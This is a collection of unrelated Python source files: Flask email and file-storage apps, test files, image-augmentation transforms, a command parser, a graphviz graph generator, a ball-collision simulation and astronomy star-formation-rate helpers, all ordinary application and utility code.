cursore.execute(query, parametri)
risultato = cursore.fetchone()
cursore.close()
return risultato
def leggi_dato(self, query, parametri):
return self.leggi_riga(query, parametri)[0]
def scrivi(self, query, parametri):
cursore = self.g.db.cursor()
cursore.execute(query, parametri)
self.g.db.commit()
cursore.close()
|
|
test/test_pipeline_manager.py
|
zuevval/topological-sorting
|
|
|
from pipeline_manager import pipeline
def test_pipeline_manager():
add_step = pipeline()
a = []
@add_step
def step1():
a.append(1)
@add_step(depends_on=["step1"])
def step2():
a.append(2)
@add_step(depends_on=["step1", "step2"])
def step3():
a.append(3)
@add_step(depends_on=["step1", "step2", "step3"])
def step4():
a.append(4)
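# Dependencies are re-executed on every call (not memoized): step4 runs step1, then step2 (with its own step1), then step3 (with its step1 and step2), then itself.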
step4()
assert a == [1, 1, 2, 1, 1, 2, 3, 4]
a = []
step3()
assert a == [1, 1, 2, 3]
@add_step
def step5():
a.append(5)
a = []
step4()
assert a == [1, 1, 2, 1, 1, 2, 3, 4]
a = []
step5()
assert a == [5]
|
|
|
joelbcastillo/NYCOpenRecords
|
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
app.lib.email_utils
~~~~~~~~~~~~~~~~
Implements e-mail notifications for OpenRecords. Flask-mail is a dependency, and the following environment variables
need to be set in order for this to work: (Currently using Fake SMTP for testing)
MAIL_SERVER: 'localhost'
MAIL_PORT: 2500
MAIL_USE_TLS: FALSE
MAIL_USERNAME: os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD: os.environ.get('MAIL_PASSWORD')
DEFAULT_MAIL_SENDER: 'Records Admin <<EMAIL>>'
"""
from flask import current_app, render_template
from flask_mail import Message
from app import mail, celery, sentry
from app.models import Requests
@celery.task
def send_async_email(msg):
try:
mail.send(msg)
except Exception as e:
sentry.captureException()
current_app.logger.exception("Failed to Send Email {} : {}".format(msg, e))
def send_contact_email(subject, recipients, body, sender):
msg = Message(subject, recipients, body, sender=sender)
send_async_email.delay(msg)
def send_email(subject, to=list(), cc=list(), bcc=list(), template=None, email_content=None, **kwargs):
"""
Function that sends asynchronous emails for the application.
Takes in arguments from the frontend.
:param to: Person(s) email is being sent to
:param cc: Person(s) being CC'ed on the email
:param bcc: Person(s) being BCC'ed on the email
:param subject: Subject of the email
:param template: HTML and TXT template of the email content
:param email_content: string of HTML email content that can be used as a message template
:param kwargs: Additional arguments the function may take in (ie: Message content)
"""
assert to or cc or bcc
msg = Message(current_app.config['MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=current_app.config['MAIL_SENDER'], recipients=to, cc=cc, bcc=bcc)
# Renders email template from .txt file commented out and not currently used in development
# msg.body = render_template(template + '.txt', **kwargs)
if email_content:
msg.html = email_content
else:
msg.html = render_template(template + '.html', **kwargs)
attachment = kwargs.get('attachment', None)
if attachment:
filename = kwargs.get('filename')
mimetype = kwargs.get('mimetype', 'application/pdf')
msg.attach(filename, mimetype, attachment)
send_async_email.delay(msg)
def get_agency_emails(request_id, admins_only=False):
"""
Gets a list of the agency emails (assigned users and default email)
:param request_id: FOIL request ID to query UserRequests
:param admins_only: return list of agency admin emails only
:return: list of agency emails or ['<EMAIL>'] (for testing)
"""
request = Requests.query.filter_by(id=request_id).one()
if admins_only:
return list(set(user.notification_email if user.notification_email is not None else user.email for user in
request.agency.administrators))
return list(set([user.notification_email if user.notification_email is not None else user.email for user in
request.agency_users] + [request.agency.default_email]))
|
|
topCoder/srms/100s/srm152/div2/league_picks.py
|
|
|
|
class LeaguePicks:
def returnPicks(self, position, friends, picks):
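# Serpentine (snake) draft: with `friends` players, the player in slot `position` picks at that slot in odd rounds and at slot friends - position + 1 in even rounds; return the overall pick numbers received out of `picks` total picks.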
ls, d, r, i = [], True, friends - position + 1, 0
while (d and picks >= position) or (not d and picks >= r):
ls.append(i + (position if d else r))
i += friends
picks -= friends
d = not d
return ls
|
|
|
|
|
|
from typing import List, Any, Dict, Callable, Tuple
from .errors import NoClosingQuote, NoActionFound
from .utils import get_ctxs, Flags, Options
from .action import Action
import re
import traceback
from inspect import isawaitable
quoteRe = re.compile(r"[\"']")
chunk = re.compile(r"\S+")
class SourceStr(str):
pass
class Performer:
def __init__(self, ctx: Tuple[Any, ...] = (), *, loop=None):
self.commands = {}
self.lookup = {}
self.ctx = ctx + (self,)
self.loop = loop
def register(self, cmd):
self.commands[cmd.name] = cmd
self.lookup[cmd.name] = cmd
cmd.performer = self
for alias in cmd.aliases:
self.lookup[alias] = cmd
return cmd
def run(self, args, ctx: Tuple[Any] = ()):
cmd_name = args.split(" ")[0]
cmd = self.lookup.get(cmd_name)
try:
if cmd:
args = self.split_args(args)
options, args = self.get_options(args, cmd.options,
cmd.option_aliases)
flags, args = self.get_flags(args, cmd.flags,
cmd.flag_aliases)
flags = Flags(flags)
options = Options(options)
if self.loop:
coro = cmd.async_invoke(args[1:], ctx + self.ctx +
(flags, options, SourceStr(args[args.index(" ") +1:])))
return self.loop.create_task(coro)
else:
return cmd.invoke(args[1:], ctx + self.ctx +
(flags, options, SourceStr(args[args.index(" ") +1:])))
raise NoActionFound("No Action called {} found".format(cmd_name))
except Exception as e:
if self.loop:
if cmd and cmd.error_handler:
self.loop.create_task(cmd.async_run_fail(e, ctx))
else:
self.loop.create_task(self.async_run_fail(e, ctx))
else:
if cmd and cmd.error_handler:
cmd.run_fail(e, ctx)
else:
self.run_fail(e, ctx)
def error(self, func):
self.fail = func
def fail(self, e):
traceback.print_exception(type(e), e, e.__traceback__)
def run_fail(self, e, ctx: Tuple[Any] = ()):
ctxs = get_ctxs(self.fail, ctx)
self.fail(e, **ctxs)
async def async_run_fail(self, e, ctx: List[Any] = ()):
ctxs = get_ctxs(self.fail, ctx)
if isawaitable(self.fail):
await self.fail(e, **ctxs)
else:
self.fail(e, **ctxs)
def split_args(self, s: str) -> List[str]:
"""Will split the raw input into the arguments"""
args = []
i = 0
while i < len(s):
char = s[i]
if re.match(quoteRe, char):
try:
j = s.index(char, i+1)
args.append(s[i + 1: j])
i = j
except ValueError:
raise NoClosingQuote("Missing closing quote.")
else:
match = chunk.match(s, i)
if match:
args.append(match.group())
i = match.end()
i += 1
return args
def get_options(self, inp: List[str], options: Dict[str, Callable],
aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]:
"""Will get options, the return will be converted as setup"""
options_out = {}
for i, arg in enumerate(inp):
name = arg[2:]
if not arg.startswith("-"):
continue
try:
if arg.startswith("-") and name in options.keys():
options_out[name] = options[name](inp[i+1])
del inp[i]
del inp[i]
elif arg.startswith("-") and name in aliases.keys():
options_out[aliases[name]] = options[name](inp[i+1])
del inp[i]
del inp[i]
except Exception as e:
raise e
return options_out, inp
def get_flags(self, inp: List[str], flags: List[str],
aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]:
"""Will get all flags"""
out = {name: False for name in flags}
for i, arg in enumerate(inp):
name = arg[1:]
if arg.startswith("-") and name in flags:
out[name] = True
del inp[i]
elif arg.startswith("-") and name in aliases.keys():
out[aliases[name]] = True
del inp[i]
return out, inp
|
|
|
|
|
|
import numpy as np
import torch
import gc
class Crop(object):
"""
Crop randomly the image in a sample.
Args: output_size (tuple or int): Desired output size. If int, square crop is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple, list))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, label = sample['image'], sample['label']
top, left = sample['top'], sample['left']
new_h, new_w = self.output_size
new_h//=2
new_w//=2
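# The low-resolution input crop is half the requested size; the label (ground truth) covers the same region at 2x resolution, so its window uses doubled coordinates.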
sample['image'] = image[top: top + new_h,
left: left + new_w,:]
sample['label'] = label[top*2: (top + new_h)*2,
left*2: (left + new_w)*2,:]
return sample
class Flip(object):
"""
shape is (h,w,c)
"""
def __call__(self, sample):
flag_lr = sample['flip_lr']
flag_ud = sample['flip_ud']
if flag_lr == 1:
sample['image'] = np.fliplr(sample['image'])
sample['label'] = np.fliplr(sample['label'])
if flag_ud == 1:
sample['image'] = np.flipud(sample['image'])
sample['label'] = np.flipud(sample['label'])
return sample
class Rotate(object):
"""
shape is (h,w,c)
"""
def __call__(self, sample):
flag = sample['rotate']
if flag == 1:
sample['image'] = sample['image'].transpose(1, 0, 2)
sample['label'] = sample['label'].transpose(1, 0, 2)
return sample
class Sharp2Sharp(object):
def __call__(self, sample):
flag = sample['s2s']
if flag < 1:
sample['image'] = sample['label'].copy()
return sample
class ToTensor(object):
"""
Convert ndarrays in sample to Tensors.
"""
def __call__(self, sample):
image, label = sample['image'], sample['label']
# swap color axis because
# numpy image: H x W x C
# torch image: C X H X W
image = np.ascontiguousarray(image.transpose((2, 0, 1))[np.newaxis, :])
label = np.ascontiguousarray(label.transpose((2, 0, 1))[np.newaxis, :])
sample['image'] = torch.from_numpy(image).float()
sample['label'] = torch.from_numpy(label).float()
return sample
def normalize(x, centralize=False, normalize=False, val_range=255.0):
if centralize:
x = x - val_range / 2
if normalize:
x = x / val_range
return x
def normalize_reverse(x, centralize=False, normalize=False, val_range=255.0):
if normalize:
x = x * val_range
if centralize:
x = x + val_range / 2
return x
def equalize_histogram(image, number_bins=256):
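# Histogram equalization: map intensities through the normalized cumulative histogram (CDF) so the output values spread approximately uniformly over [0, number_bins - 1].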
image_histogram, bins = np.histogram(image.flatten(), number_bins)
cdf = image_histogram.cumsum()
cdf = (number_bins - 1) * cdf / cdf[-1] # normalize
image_equalized = np.interp(image.flatten(), bins[:-1], cdf)
return image_equalized.reshape(image.shape)
def get_file_path(ds_type, gain='00', root_path='/data/zengyuhang_data'):
ds_type=ds_type
FILE_LIST="./data_list/"+ ds_type + "_list"
# get train IDs
with open(FILE_LIST) as f:
text = f.readlines()
_files = text
_ids = [line.strip().split(' ')[0] for line in _files]
gt_files = [line.strip().split(' ')[1] for line in _files]
in_files = [line.strip().split(' ')[2] for line in _files]
gain=gain
_ids_copy=[]
for item in _ids:
if item[-7:-5]==gain:
_ids_copy.append(item)
_ids=_ids_copy
root_path=root_path
gt_files_copy=[]
for item in gt_files:
if item[-11:-9]==gain:
gt_files_copy.append(root_path+item[1:])
gt_files=gt_files_copy
in_files_copy=[]
for item in in_files:
if item[-11:-9]==gain:
in_files_copy.append(root_path+item[1:])
in_files=in_files_copy
return _ids, gt_files, in_files
def get_all_file_path(ds_type, root_path='/data/zengyuhang_data'):
ds_type=ds_type
FILE_LIST="./data_list/"+ ds_type + "_list"
# get train IDs
with open(FILE_LIST) as f:
text = f.readlines()
_files = text
_ids = [line.strip().split(' ')[0] for line in _files]
gt_files = [line.strip().split(' ')[1] for line in _files]
in_files = [line.strip().split(' ')[2] for line in _files]
return _ids, gt_files, in_files
def gen_var(seqs):
records=dict()
for seq in seqs:
sample=dict()
print(seq[0],"start loading...")
temp_dark=np.load(seq[0])
dark_shape=temp_dark.shape
del temp_dark
gc.collect()
print(seq[0],"start loading and EH process...")
sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536)
# sample['Dark']=equalize_histogram(np.load(seq[0]),65536)
print(seq[0],"is processed")
print(seq[1],"start loading...")
temp_bright=np.load(seq[1])
bright_shape=temp_bright.shape
del temp_bright
gc.collect()
sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape)
# sample['Bright']=np.load(seq[1])
print(seq[1],"is loaded")
# print('dark_shape',sample['Dark'].shape)
# print('bright_shape',sample['Bright'].shape)
records[seq]=sample
return records
def gen_seq(seq):
sample=dict()
print(seq[0],"start loading...")
temp_dark=np.load(seq[0])
dark_shape=temp_dark.shape
del temp_dark
gc.collect()
print(seq[0],"start loading and EH process...")
sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536)
print(seq[0],"is processed")
print(seq[1],"start loading...")
temp_bright=np.load(seq[1])
bright_shape=temp_bright.shape
del temp_bright
gc.collect()
sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape)
print(seq[1],"is loaded")
# print('dark_shape',sample['Dark'].shape)
# print('bright_shape',sample['Bright'].shape)
return sample
|
|
|
|
|
|
import os
import json
import errno
from node import Node
from subprocess import call
from werkzeug.utils import secure_filename
from flask import Flask, render_template, abort, request, jsonify
from jinja2 import TemplateNotFound
app = Flask(__name__)
controller = None
ip = None
port = None
class WebApp():
def __init__(self, ctrl, host, p):
global controller, ip, port
controller = ctrl
ip = host
port = p
@app.route('/', methods=['GET'])
def show_page():
try:
return render_template('upload.html', rest_host=ip, rest_port=port,
entries=controller.get_ledger_entries())
except TemplateNotFound:
abort(404)
@app.route('/storage', methods=['POST'])
def upload_file():
if 'file' in request.files:
success = controller.store(
secure_filename(request.files['file'].filename),
request.files['file']
)
if success:
response = jsonify({"msg": 'File uploaded successfully.'})
response.status_code = 200
return response
else:
response = jsonify({"msg": "File couldn't be written to nodes."})
response.status_code = 500
return response
return jsonify({"msg": "File not present in request"})
@app.route('/storage/<file_name>', methods=['GET'])
def download_file(file_name):
        file = controller.retrieve(
            secure_filename(file_name)
        )
if file:
response = jsonify({"content": file})
response.status_code = 200
return response
else:
response = jsonify({"msg": "File couldn't be found."})
response.status_code = 500
return response
@app.route('/strategy/<choice>', methods=['POST'])
def set_strategy(choice):
        controller.set_strategy(choice)
        return jsonify({"msg": f"Strategy set to {choice}."})
def start(self):
app.run(debug=True, host=ip, port=port)
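# Hedged usage sketch (illustrative only, never executed): the controller passed to WebApp
# is assumed to expose get_ledger_entries(), store(), retrieve() and set_strategy(); the
# DummyController name below is hypothetical and only shows how the app is wired up.
def _demo_webapp():
    class DummyController:
        def get_ledger_entries(self):
            return []

        def store(self, file_name, file_obj):
            return True

        def retrieve(self, file_name):
            return None

        def set_strategy(self, choice):
            pass

    WebApp(DummyController(), '127.0.0.1', 5000).start()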
|
|
classical_algorithms/python/tests/test_binary_search.py
|
|
|
|
import unittest
from classical_algorithms.python.BinarySearch import BinarySearch
class TestBinarySearch(unittest.TestCase):
def test_binary_search(self):
binary_search = BinarySearch()
print('None Input')
self.assertRaises(TypeError, binary_search.search, None)
print('Empty Input')
self.assertEqual(binary_search.search([], 1), False)
print('One Element')
self.assertEqual(binary_search.search([25], 25), 0)
print('Two or More Elements')
array = [0, 10, 15, 100, 150, 200, 203, 230]
self.assertEqual(binary_search.search(array, 15), 2)
print('Two or More with negative Elements')
array = [-20, -15, -5, 0, 10, 15, 100, 150, 200, 203, 230]
self.assertEqual(binary_search.search(array, -15), 1)
print('Success: binary_search_search\n')
if __name__ == '__main__':
unittest.main()
|
|
server/website/script/fixture_generators/metric_settings/oracle/create_metric_settings.py
|
|
|
|
#
# OtterTune - create_metric_settings.py
#
# Copyright (c) 2017-18, Carnegie Mellon University Database Group
#
import json
import shutil
def main():
final_metrics = []
with open('oracle.txt', 'r') as f:
odd = 0
entry = {}
fields = {}
lines = f.readlines()
for line in lines:
line = line.strip().replace("\n", "")
if not line:
continue
if line == 'NAME' or line.startswith('-'):
continue
if odd == 0:
entry = {}
entry['model'] = 'website.MetricCatalog'
fields = {}
fields['name'] = "global." + line
fields['summary'] = line
fields['vartype'] = 2 # int
fields['scope'] = 'global'
fields['metric_type'] = 3 # stat
if fields['name'] == "global.user commits":
fields['metric_type'] = 1 # counter
fields['dbms'] = 18 # oracle
entry['fields'] = fields
final_metrics.append(entry)
with open('oracle_metrics.json', 'w') as f:
json.dump(final_metrics, f, indent=4)
shutil.copy('oracle_metrics.json', '../../../../website/fixtures/oracle_metrics.json')
if __name__ == '__main__':
main()
|
|
|
|
|
|
from setuptools import setup, find_packages
with open('README.md', 'r') as readme:
long_desc = readme.read()
setup(name='wsgimagic',
version='1.0.0',
description='Serverless WSGI apps made easy',
packages=find_packages(exclude=('tests',)),
author="<NAME>",
license="MIT",
long_description=long_desc,
long_description_content_type='text/markdown')
|
|
|
|
|
|
from flask import g, make_response, jsonify
from flask_httpauth import HTTPBasicAuth
from app.api.errors import error_response
from app.models import User
auth = HTTPBasicAuth()
@auth.verify_password
def verify_password(username_or_token, password):
user = User.verify_auth_token(username_or_token)
if not user:
user = User.query.filter_by(username=username_or_token).first()
if not user or not user.verify_password(password):
return False
g.user = user
return True
@auth.error_handler
def basic_auth_error(status):
    # Only one @auth.error_handler callback can be active; registering a second one would
    # silently replace this one, so both responses are folded into a single handler.
    if status == 401:
        return make_response(jsonify({'error': 'Unauthorized access'}), 401)
    return error_response(status)
|
|
app/esper/queries/interview_with_person_x.py
|
scanner-research/esper-tv
|
|
|
from esper.prelude import *
from .queries import query
@query('Interview with person X (rekall)')
def interview_with_person_x():
from query.models import LabeledCommercial, FaceIdentity
from rekall.video_interval_collection import VideoIntervalCollection
from rekall.temporal_predicates import before, after, overlaps
from rekall.logical_predicates import or_pred
    from esper.rekall import intrvllists_to_result
    from django.db.models import F
# Get list of sandbox video IDs
sandbox_videos = [
row.video_id
for row in LabeledCommercial.objects.distinct('video_id')
]
TWENTY_SECONDS = 600
FORTY_FIVE_SECONDS = 1350
EPSILON = 10
guest_name = "<NAME>"
# Load hosts and instances of guest from SQL
identities = FaceIdentity.objects.filter(face__shot__video_id__in=sandbox_videos)
hosts_qs = identities.filter(face__is_host=True)
guest_qs = identities.filter(identity__name=guest_name).filter(probability__gt=0.7)
    # Load host and guest shot intervals from the Django querysets
hosts = VideoIntervalCollection.from_django_qs(
hosts_qs.annotate(video_id=F("face__shot__video_id"),
min_frame=F("face__shot__min_frame"),
max_frame=F("face__shot__max_frame"))
)
guest = VideoIntervalCollection.from_django_qs(
guest_qs.annotate(video_id=F("face__shot__video_id"),
min_frame=F("face__shot__min_frame"),
max_frame=F("face__shot__max_frame"))
)
# Get all shots where the guest and a host are on screen together
guest_with_host = guest.overlaps(hosts).coalesce()
# This temporal predicate defines A overlaps with B, or A before by less than 10 frames,
# or A after B by less than 10 frames
overlaps_before_or_after_pred = or_pred(
or_pred(overlaps(), before(max_dist=EPSILON), arity=2),
after(max_dist=EPSILON), arity=2)
# This code finds sequences of:
# guest with host overlaps/before/after host OR
# guest with host overlaps/before/after guest
interview_candidates = guest_with_host \
.merge(hosts, predicate=overlaps_before_or_after_pred) \
.set_union(guest_with_host.merge(
guest, predicate=overlaps_before_or_after_pred)) \
.coalesce()
# Sequences may be interrupted by shots where the guest or host don't
# appear, so dilate and coalesce to merge neighboring segments
interviews = interview_candidates \
.dilate(TWENTY_SECONDS) \
.coalesce() \
.dilate(-1 * TWENTY_SECONDS) \
.filter_length(min_length=FORTY_FIVE_SECONDS)
# Return intervals
return intrvllists_to_result(interviews.get_allintervals())
|
|
|
|
|
|
#!/usr/bin/env python3
"""
Starts a service on 127.0.0.1:25025 which serves as a sink for email
"""
### requires the python-pidfile library from https://github.com/mosquito/python-pidfile
### requires aiosmtpd
import asyncio, pidfile, signal, functools
from smtplib import SMTP, SMTPRecipientsRefused
import aiosmtpd
from aiosmtpd.handlers import Sink
from aiosmtpd.smtp import SMTP as SMTPServer
import logging
LISTEN_PORT = 25025
# TRANSMIT_PORT = 10026
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def signal_handler(sig, *args):
    if sig in {signal.SIGTERM, signal.SIGINT}:
logger.debug(f"CHAPPS exiting on {signal.Signals(sig)} ({sig}).")
raise SystemExit
def install_asyncio_signal_handlers(loop):
for signame in {"SIGTERM", "SIGINT"}:
sig = getattr(signal, signame)
loop.add_signal_handler(sig, functools.partial(signal_handler, sig))
# class NullFilterHandler:
# async def handle_RCPT(self, server, session, envelope, address, rcpt_options):
# """Handle recipient phase"""
# envelope.rcpt_tos.append( address )
# return "250 OK"
# async def handle_DATA(self, server, session, envelope):
# """Handle DATA phase"""
# logger.debug(f"Message from {envelope.mail_from} to ")
# try:
# client = SMTP.sendmail( envelope.mail_from, envelope.rcpt_tos, envelope.content )
# return '250 Message accepted for delivery'
# except smtplib.SMTPResponseException as e:
# logger.exception("Upstream Postfix did not like this message.")
# return f"{e.smtp_code} {e.smtp_error}"
# except smtplib.SMTPException:
# logger.exception("Raised trying to send from {envelope.mail_from} to {','.join(envelope.rcpt_tos)}")
# return "550 Requested action not taken"
async def main():
"""The grand shebang"""
logger.debug("Starting SMTP sink...")
try:
with pidfile.PIDFile("/tmp/mail-sink.pid"):
logger.debug("mail-sink started.")
loop = asyncio.get_running_loop()
install_asyncio_signal_handlers(loop)
srv = await loop.create_server(
functools.partial(SMTPServer, Sink),
"localhost",
LISTEN_PORT,
start_serving=False,
)
async with srv:
await srv.serve_forever()
except pidfile.AlreadyRunningError:
logger.exception("mail-sink is already running. Exiting.")
except asyncio.exceptions.CancelledError:
logger.debug("mail-sink exiting on signal.")
if __name__ == "__main__":
try:
asyncio.run(main())
except Exception:
logger.exception("UNEX")
|
|
|
ParthaAcharjee/Ball-Movement-in-2D
|
|
|
# Ball movement in 2D space: An example of elastic collision and position tracking.
import random as rnd
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.animation as animation
class ball:
'Ball class, store ball position and velocities'
count=0
def __init__(self,**arg):
if 'x' in arg.keys():
self.x=arg['x'];
else:
self.x=rnd.randrange(0,100,1);
if 'y' in arg.keys():
self.y=arg['y'];
else:
self.y=rnd.randrange(0,100,1);
if 'r' in arg.keys():
self.r=arg['r'];
else:
self.r=1;
if 'vx' in arg.keys():
self.vx=arg['vx'];
else:
self.vx=rnd.randrange(-10,10,1);
if 'vy' in arg.keys():
self.vy=arg['vy'];
else:
self.vy=rnd.randrange(-10,10,1);
ball.count+=1;
def show(self):
print("x,y,vx,vy: ",self.x,self.y,self.vx,self.vy)
def plot(self):
plt.scatter(self.x,self.y)
plt.show()
def updatePosition(self,t,L):
xmin,xmax,ymin,ymax=L;
xnew=self.x+self.vx*t;
ynew=self.y+self.vy*t;
if xnew>xmax: xnew=2*xmax-xnew;self.vx=-self.vx;
if xnew<xmin: xnew=2*xmin-xnew;self.vx=-self.vx;
if ynew>ymax: ynew=2*ymax-ynew;self.vy=-self.vy;
if ynew<ymin: ynew=2*ymin-ynew;self.vy=-self.vy;
self.x=xnew;
self.y=ynew;
return
########### End of classes ####################
def checkCollision(a,b):
return pow(pow(a.x-b.x,2)+pow(a.y-b.y,2),0.5)<(a.r+b.r)
def collisionUpdate(a,b):
c=((a.vx-b.vx)*(a.x-b.x)+(a.vy-b.vy)*(a.y-b.y))/(pow(a.x-b.x,2)+pow(a.y-b.y,2));
a.vx=a.vx-c*(a.x-b.x);
a.vy=a.vy-c*(a.y-b.y);
b.vx=b.vx+c*(a.x-b.x);
b.vy=b.vy+c*(a.y-b.y);
return a,b;
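# Quick sanity check for the equal-mass elastic collision update above (illustrative only,
# never called by the simulation): total momentum along x and y must be unchanged.
def _demo_collision_conserves_momentum():
    a = ball(x=0, y=0, vx=1, vy=0, r=1)
    b2 = ball(x=1, y=0, vx=-1, vy=0, r=1)
    px_before, py_before = a.vx + b2.vx, a.vy + b2.vy
    a, b2 = collisionUpdate(a, b2)
    assert abs((a.vx + b2.vx) - px_before) < 1e-9
    assert abs((a.vy + b2.vy) - py_before) < 1e-9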
########### End of functions ####################
N=50
b=[ball() for k in range(0,N)]
t=0.1
boundary=(0,100,0,100)
CYCLE=500;
ims=[]
fig=plt.figure()
ax = fig.add_axes([0, 0, 1, 1], frame_on=False)
ax.set_xlim(-1, 101), ax.set_xticks([])
ax.set_ylim(-1, 101), ax.set_yticks([])
for cycle in range(0,CYCLE):
for m in range(0,N-1):
for n in range(m+1,N):
collision=checkCollision(b[m],b[n])
if collision:
b[m],b[n]=collisionUpdate(b[m],b[n])
continue
for k in range(0,N):
b[k].updatePosition(t,boundary);
data=np.zeros((N,2))
for k in range(0,N):
data[k,]=b[k].x,b[k].y
#data=np.append(data,[[0,0],[0,100],[100,0],[100,100]],axis=0)
#plt.hold(False)
im=ax.scatter(data[:,0],data[:,1], animated=True, color='blue')
ims.append([im])
#plt.axis([-1,101,-1,101])
#plt.pause(0.0000001)
ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True,
                                repeat_delay=10)
plt.show()
|
|
graph_notes/compile/generate_graphs.py
|
weepingwillowben/interactive_info_graph
|
|
|
from .utils import read_csv,join,key_dictlist_by,linejoin,read_file,write_file
import subprocess
import os
import json
import re
import multiprocessing
from concurrent.futures import ThreadPoolExecutor
def create_multiline_description(descrip):
words = descrip.split()
cur_line = ''
lines = []
MAX_LINE_LEN = 32
for word in words:
added_line = cur_line + " " + word
if len(added_line) > MAX_LINE_LEN:
lines.append(cur_line)
cur_line = word
else:
cur_line = added_line
if cur_line:
lines.append(cur_line)
return "<BR/>".join(lines)
def create_label(node):
title = f"<B>{node['title']}</B>"
if node['description'] and node['description'] != "NA":
return title+"<BR/>"+create_multiline_description(node['description'])
else:
return title
def generate_graphviz_code(all_nodes,all_relations,show_nodes,node_types,rel_types):
show_nodes = set(show_nodes)
nodes = [n for n in all_nodes if n['node'] in show_nodes]
relations = [rel for rel in all_relations
if rel['source'] in show_nodes and rel['dest'] in show_nodes and (rel['type'] == 'dependent' or rel['type'] == 'equal')]
node_graph = [f'{n["node"]} [label=<{create_label(n)}>,color="{node_types[n["type"]]["color"]}",id={n["node"]+"__el"}]' for n in nodes]
rel_graph = [f'{rel["source"]} -> {rel["dest"]} [color="{rel_types[rel["type"]]["color"]}"]' for rel in relations]
graph = f'''
digraph search {{
overlap = false;
{linejoin(node_graph)}
{linejoin(rel_graph)}
}}
'''
return graph
def call_graphviz(graphviz_code):
graphviz_args = "dot -Tsvg".split(' ')
out = subprocess.run(graphviz_args,input=graphviz_code,stdout=subprocess.PIPE,encoding="utf-8").stdout
#print("\n".join(out.split("\n")[:3]))
stripped = "\n".join(out.split("\n")[3:])
comments_removed = re.sub("(<!--.*?-->)", "", stripped, flags=re.DOTALL)
return comments_removed
def get_adj_list(nodes,relations):
return {n['node']:[rel['dest'] for rel in relations if rel['source'] == n['node']] for n in nodes}
def score_nodes(root,adj_list):
scores = dict()
depth_nodes = [root]
for x in range(10):
new_depth_nodes = []
for n in depth_nodes:
if n not in scores:
scores[n] = 8.**(-x) * (1+1e-5*len(adj_list[n]))
for e in adj_list[n]:
new_depth_nodes.append(e)
depth_nodes = new_depth_nodes
sortables_scores = [(v,k) for k,v in scores.items()]
sortables_scores.sort(reverse=True)
return [n for v,n in sortables_scores]
def generate_all_graphs(graph_size,nodes,relations,node_types,rel_types):
adj_list = get_adj_list(nodes,relations)
nodes_generated = {}
node_to_idx = {}
vis_codes = []
for node in nodes:
node_names = score_nodes(node['node'],adj_list)[:graph_size] if graph_size < len(adj_list) else list(adj_list)
uniq_node_names = tuple(sorted(node_names))
if uniq_node_names not in nodes_generated:
nodes_generated[uniq_node_names] = len(vis_codes)
node_to_idx[node['node']] = len(vis_codes)
viz_code = generate_graphviz_code(nodes,relations,node_names,node_types,rel_types)
vis_codes.append(viz_code)
else:
node_to_idx[node['node']] = nodes_generated[uniq_node_names]
pool = ThreadPoolExecutor(max_workers=multiprocessing.cpu_count())
svg_codes = list(pool.map(call_graphviz,vis_codes))
graphs = [(node['node'],svg_codes[node_to_idx[node['node']]]) for node in nodes]
return graphs
def save_graphs_as_files(dest_folder,svg_list):
os.makedirs(dest_folder,exist_ok=True)
for node_name,svg_code in svg_list:
fname = node_name+".svg"
dest_path = os.path.join(dest_folder,fname)
write_file(dest_path,svg_code)
def encode_graphs_as_html(svg_list):
all_data = [""]
for node_name,svg_code in svg_list:
stripped_svg_code = svg_code.replace("\n","")
        data_str = f'<script id="{node_name+"__svg"}" type="application/svg">{stripped_svg_code}</script>'
all_data.append(data_str)
return "\n\t\t".join(all_data)
if __name__ == "__main__":
node_types = key_dictlist_by(read_csv("examples/computer_science/node-types.csv"),'type_id')
rel_types = key_dictlist_by(read_csv("examples/computer_science/rel-types.csv"),'type_id')
nodes = read_csv("examples/computer_science/nodes.csv")
rels = read_csv("examples/computer_science/relationships.csv")
show_nodes = [n['node'] for n in nodes]
graph_code = (generate_graphviz_code(nodes,rels,show_nodes,node_types,rel_types))
print(graph_code)
svg_code = call_graphviz(graph_code)
html_code = encode_graphs_as_html([("bob",svg_code)])
print(svg_code)
print(html_code)
|
|
|
mattcwilde/werk-squad-tools
|
|
|
import pandas as pd
import numpy as np
from astropy import constants as const
from astropy import units as u
from astropy.cosmology import FlatLambdaCDM
def SFR(Ha_array):
"""
    Calculate star formation rate (SFR) from H-alpha luminosity.
    -------------------------------------------
    Method:
    SFR = 7.9e-42 * L(H-alpha), with L(H-alpha) in erg/s
    ------------------------------------------
    Args:
    Numpy nd.array of H-alpha Luminosities
    ------------------------------------------
    Returns:
    Numpy nd.array of SFR values
"""
SFR = np.array([])
SFR_calc = [((7.9e-42) * i) for i in Ha_array]
SFR = np.append(SFR, SFR_calc)
return SFR
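# Worked example (illustrative only, never called here): with the 7.9e-42 calibration used
# above, an H-alpha luminosity of about 1.27e41 erg/s maps to roughly one solar mass per year.
def _demo_SFR():
    luminosities = np.array([1.27e41, 2.54e41])
    return SFR(luminosities)  # ~ [1.0, 2.0]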
def SFR_switchboard(lines_df):
"""
Assign flags based on which lines are used to calculate SFR/ H-alpha Luminosity
if Flag = 'NaN' -- No determination
= 'Ha' -- H-alpha lines used
= 'Hb' -- H-beta lines used
-------------------------------------------
Method Assumed for SFR/H-alpha Lum calculations:
Ha_Lum_Ha = (LQ_cut_Ha['Halpha_flux']) * (4 * np.pi * (LQ_cut_Ha['Distance_cm'])**2)
Ha_Lum_Hb = ((LQ_cut_Hb['Hbeta_flux']) * 2.86) * (4 * np.pi * (LQ_cut_Hb['Distance_cm'])**2)
Where LQ_cut_* corresponds to using the respective *_cond written in this function
SFR = ((7.9e-42) * Ha_Lum)
------------------------------------------
Args:
DataFrame containing Line Quality information for H-alpha and H-beta
------------------------------------------
Returns:
